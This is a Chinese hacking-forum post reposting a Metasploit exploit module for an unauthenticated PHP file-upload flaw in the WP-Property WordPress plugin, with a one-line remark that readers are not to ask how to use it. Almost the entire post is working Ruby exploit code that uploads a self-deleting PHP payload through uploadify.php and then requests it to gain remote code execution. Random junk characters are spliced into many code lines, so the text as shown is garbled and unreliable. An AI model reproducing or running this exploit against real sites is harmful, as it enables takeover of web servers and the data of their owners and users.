找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2288|回复: 0
打印 上一主题 下一主题

WordPress WP-Property PHP 文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-4 19:51:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
WordPress WP-Property PHP 文件上传漏洞
9 P& \4 w% k* Q4 E, K# V$ z
6 ~% a4 r$ ^3 N0 t ## # This file is part of the Metasploit Framework and may be subject to0 p( }4 ?: _2 c; _' a2 N6 e
! l' v6 P# ?3 ^) i
# redistribution and commercial restrictions. Please see the Metasploit
8 R4 y/ K: Z$ N) t2 y% B+ j1 ?8 l4 Y" z! G4 {& ~
# Framework web site for more information on licensing and terms of use.
$ {: N" k" I) b* T1 n1 `6 a2 p* v2 U# k
#   http://metasploit.com/framework/ ##
5 k" H& A4 V1 c& j1 T0 ?1 f9 |, C: b7 J. A* U4 M* e/ ?
( b8 L( H/ q% w/ f
4 o7 C; H3 R+ ~! X  Y( X7 Z

- C' I0 _9 e+ u3 [& _/ }4 L
7 ]  k2 z- p" vrequire 'msf/core'8 @$ v: n- f' q: f( ^, |; z. I
require 'msf/core/exploit/php_exe'0 K& H& A* W- d, X; y

" f, G$ P, i, yclass Metasploit3 < Msf::Exploit::Remote     Rank = ExcellentRanking       include Msf::Exploit::Remote::HttpClient     include Msf::Exploit:hpEXE       def initialize(info = {})         super(update_info(info,             'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',; A6 V8 {1 L& L( N; J- E
'Description'    => %q{
: v1 Z: F$ P& l" P( DThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress                 plugin. By abusing the uploadify.php file, a malicious user can upload a file to a                 temp directory without authentication, which results in arbitrary code execution.             },             'Author'         =>
# ]7 l0 e. P. r& \[
- {) W8 K! X& i. j'Sammy FORGIT', # initial discovery5 o  P+ _! U3 R
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
7 o) ]. J, Z1 }/ [2 n],3 w$ A1 K& R8 M( Q. v0 B1 h
'License'        => MSF_LICENSE,' U( e( c4 V3 a7 s- l$ m5 d) _
'References'     =>; }) j: n! V& u9 S( r
[) Q9 b, I& {4 I
[ 'OSVDB', '82656' ],
- v1 C2 W+ X+ I! n5 v[ 'BID', '53787' ],+ X4 j. E! A9 e" t
[ 'EDB', '18987'],7 J5 J) j+ s* Y5 I
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]. `/ r; H% t" ^* u; L! Q3 O6 c1 l
],0 X! ^+ y$ e' H5 Q/ w: O) u
'Payload'        =>- a3 W% N9 I  ~/ t' c3 L
{0 Y* R; i  e  m* H) {
'BadChars' => "\x00",
# B6 x/ |* p0 ^, Z) N* N, `},
: s' W0 X4 t2 M, ]4 K. j7 [& [& |  _0 P'Platform'       => 'php',
: T' ?& A1 W4 }& {'Arch'           => ARCH_PHP,1 G5 |, L- ?6 k% Z
'Targets'        =>* [" T. F4 s1 `; W, I
[
3 Q1 `0 a/ E8 ^, m2 c, Z[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],0 Y/ G2 R+ \  n+ z2 J  \0 b( D
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]. S8 v" m! h+ D* \
],' d6 |6 @/ s2 }# Q  ?
'DefaultTarget'  => 0,
% E. A8 O. B  f'DisclosureDate' => 'Mar 26 2012'))
3 V/ K7 v8 y. j% m$ N% a4 U
2 k" V/ j% p3 n' |0 m+ k0 Tregister_options(, \1 j! b- x' r' N9 h) O
[# h1 c9 e1 j+ f& z; {% Y
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress']); @2 c) N2 i5 X
], self.class)5 b, J# W. U; v0 l; z: p, F0 Z. `
end
" m: {& s6 _; l9 \& g
% m! v. L+ j5 D" gdef check
2 {1 f6 @% r" U3 duri =  target_uri.path
. C4 [% U8 l8 g0 }/ G  @! C$ j+ Euri << '/' if uri[-1,1] != '/'           res = send_request_cgi({             'method' => 'GET',
8 P2 {9 f8 w3 e'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"8 [8 S- n% _/ F' E% d$ r
})
$ ?. T6 {1 ~8 |  l2 K2 E1 k2 T+ E, @/ N8 P5 X$ Q& u% T6 P, @
if not res or res.code != 200/ o! `9 F7 R/ t  G" `
return Exploit::CheckCode::Unknown) ^) S$ L1 a( g0 H& {  |; p( m5 ?+ U
end
* y1 _9 S  a0 s4 v4 M! C. i$ H- R' U$ m7 A$ L, u
return Exploit::CheckCode::Appears! K6 F- j% o& s6 g4 [
end. w# }- n0 r% d7 G  f" S3 _

" o/ ]6 V- T7 [. l) k( sdef exploit. A  Z  r1 @2 M' K# u
uri =  target_uri.path
7 A* S3 R3 G3 |" y. ?. y+ ouri << '/' if uri[-1,1] != '/'           peer = "#{rhost}:#{rport}"           @payload_name = "#{rand_text_alpha(5)}.php"         php_payload = get_write_exec_payload(:unlink_self=>true), i- u5 c/ d9 }. L' j
# H1 s& m; z- ]# p( u* m, A
data = Rex::MIME::Message.new
- \1 [8 I: v  ]7 H$ s- zdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
6 o2 k3 B8 E, n" cdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")7 |4 S- R3 U$ V; X6 W& t
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')0 |9 G/ X0 N1 R) T! A
0 C2 f6 r, o! I3 D% R
print_status("#{peer} - Uploading payload #{@payload_name}")
9 b% z( w' d* K8 |, n9 t4 ]res = send_request_cgi({
7 g/ U4 A* ?. y; \/ I8 w! o'method' => 'POST',
4 ?7 ~& g" l; Q1 \* m'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
/ c# _) R: S$ l( P6 Z'ctype'  => "multipart/form-data; boundary=#{data.bound}",5 A. F7 |9 e# E/ e
'data'   => post_data
& X( N$ `  z: ~2 A8 U$ B6 f# r})
. t( h* f/ Y* J' M# p) t8 o8 G# \* A; U# |
if not res or res.code != 200 or res.body !~ /#{@payload_name}/% E2 Z3 u/ @5 E" }
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
. V, c5 l' G! M: t: \end
: c! X; o, b/ G4 {* F) N
$ Z0 F3 S- x+ _4 Q) M4 Supload_uri = res.body
% L9 ?$ C; b% w: U) N$ h
  @7 G; r: |+ e/ h: C$ Mprint_status("#{peer} - Executing payload #{@payload_name}")# G- ^6 P* e. \) }4 T' Q
res = send_request_raw({- E& }% a+ I' y! P4 P
'uri'    => upload_uri,$ j) j. |3 m) l7 K9 a# f% f
'method' => 'GET'4 i* ]/ ]: O# q0 \( L1 F1 G
})
; B% n9 o  k0 Dend* `/ X1 i4 V. u* a" Y+ K3 o- P( m
end5 m6 P: N- s6 P* m3 E' _" K( I
4 j' B$ L0 \9 {% q9 v; C" I1 p
不要问我这写的是什么 怎么利用 我是说msf.
: f* ]& E7 L& c; |5 {
3 q0 X5 o) g; \' h, A
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表